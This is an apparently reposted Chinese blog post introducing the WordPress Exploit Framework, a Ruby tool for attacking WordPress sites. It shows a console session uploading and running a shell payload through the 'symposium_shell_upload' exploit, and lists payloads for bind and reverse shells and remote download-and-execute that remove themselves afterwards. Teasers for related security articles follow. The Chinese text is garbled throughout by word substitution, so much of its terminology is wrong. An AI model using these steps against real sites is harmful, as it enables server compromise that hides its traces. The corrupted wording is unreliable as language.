用于浸透测验WordPress的Ruby结构:WordPress Exploit Framework

访客5年前黑客工具647

这个Ruby结构包括一些能够浸透测验WordPress网站和体系的模块,用户也能够自己开发模块扩展其功用。
运转它需求什么条件?
保证体系上装置了Ruby 2.2.x,翻开一个指令行窗口,切换当时目录到WPXF文件夹下,运转指令“bundle install”,假如你的体系上没有装置bundler,能够经过履行指令“gem install bundler”装置。
怎么运用它?
翻开一个指令行窗口,切换当时目录到你下载保存WordPress Exploit Framework的途径,履行指令“ruby wpxf.rb”就能够发动它。
wpxf一旦加载起来,会呈现一个wpxf提示符,你能够运用“search”指令来搜索模块,运用“use”指令来加载模块。
把模块加载到程序运转环境中后,能够运用“set”指令来设置选项参数,运用“info”指令检查模块相关的信息。
下面是一个比如,加载“symposium_shell_upload”缝隙运用模块,设置模块和载荷的参数,最终,履行这个缝隙运用模块进犯方针。
wpxf > use exploit/symposium_shell_upload
[+] Loaded module: #
wpxf [exploit/symposium_shell_upload] > set host wp-sandbox
[+] Set host => wp-sandbox
wpxf [exploit/symposium_shell_upload] > set target_uri /wordpress/
[+] Set target_uri => /wordpress/
wpxf [exploit/symposium_shell_upload] > set payload exec
[+] Loaded payload: #
wpxf [exploit/symposium_shell_upload] > set cmd echo "Hello, world!"
[+] Set cmd => echo "Hello, world!"
wpxf [exploit/symposium_shell_upload] > run
[-] Preparing payload...
[-] Uploading the payload...
[-] Executing the payload...
[+] Result: Hello, world!
[+] Execution finished successfully
在github能够获得一切指令的列表。
辅佐模块和缝隙运用模块有什么区别?
辅佐模块并不能让你在方针机器上运转进犯载荷,可是能够解析方针的信息,提高权限或许供给拒绝服务的功用。
缝隙运用模块需求你指定一个进犯载荷,这将会在方针机器上履行,你能够在方针机上履行恣意代码提取信息,树立一个长途shell或许其他你想在Web服务器上做的工作。
有哪些可用的载荷?
bind_php:上传一个在特定端口监听的脚本,答应WPXF树立一个长途shell;
custom:上传并履行一个定制的PHP脚本;
download_exec:下载并运转一个长途可履行文件;
exec:在长途服务器上运转一个shell指令,并把成果返回到WPXF会话;
reverse_tcp:上传一个能够树立反连TCP shell的脚本;
除了“custom”,一切这些载荷都会在履行完之后删去自己,防止在运用之后或许树立shell衔接失利之后遗留在方针机器上。
怎么编写自己的模块和载荷?
编写模块和载荷的办法能够在Github找到,一切的API文档都在Getwpxf。
在github能够下载Wordpress-Exploit-Framework
 

相关文章

东西引荐:Raptor WAF,轻量级WEB使用防火墙

  Raptor是一款选用C言语编写的WEB运用防火墙,运用DFA来阻挠SQL注入、Xss目录遍历等进犯。 编译&装置 $ git clone https://github.com/Cool...

8个增强 PHP 程序安全的函数

 安满是编程十分重要的一个方面。在任何一种编程言语中,都供给了许多的函数或许模块来保证程序的安全性。在现代网站运用中,常常要获取来自世界各地用户的输入,可是,咱们都知道“永久不能信任那些用户输入的数据...

服务端模板注入:现代WEB长途代码履行

0x01 开发Exploit 许多的模板引擎都会企图约束模板程序履行恣意代码才能,来防止应用层逻辑对表达式引擎的进犯。还有一些模板引擎则测验经过沙盒等手法来安全处理不可信的用户输入。在这些办法之下,开...

网易云音乐PC客户端加密API逆向解析

1、前语 网上现已有许多的web端接口解析的办法了,可是对客户端的接口解析基本上找不到什么材料,本文首要剖析网易云音乐PC客户端的API接口交互方法。 经过内部的署理设置,运用fiddler作为署理东...

如何用虚拟钱银匿名注册域名

以比特币为首的P2P虚拟钱银推翻了人们对钱银的认知,也为网上生意供给了新的途径。近几年来,虚拟钱银付出以其去中心化、匿名性等特色深受欢迎,活泼在各个领域,涵盖了电商、慈悲安排、企业院校等合法组织,当然...

VulnHub挑战赛Pipe解题思路

今日我将给我们演示我是怎么处理VulnHub挑战赛这道名为Pipe标题的。 当然CTF玩的便是思路,这篇文章的思路纷歧定是最好的。只是作为抛砖,欢迎我们在文尾下载这道标题来玩! 枚举 PORT    ...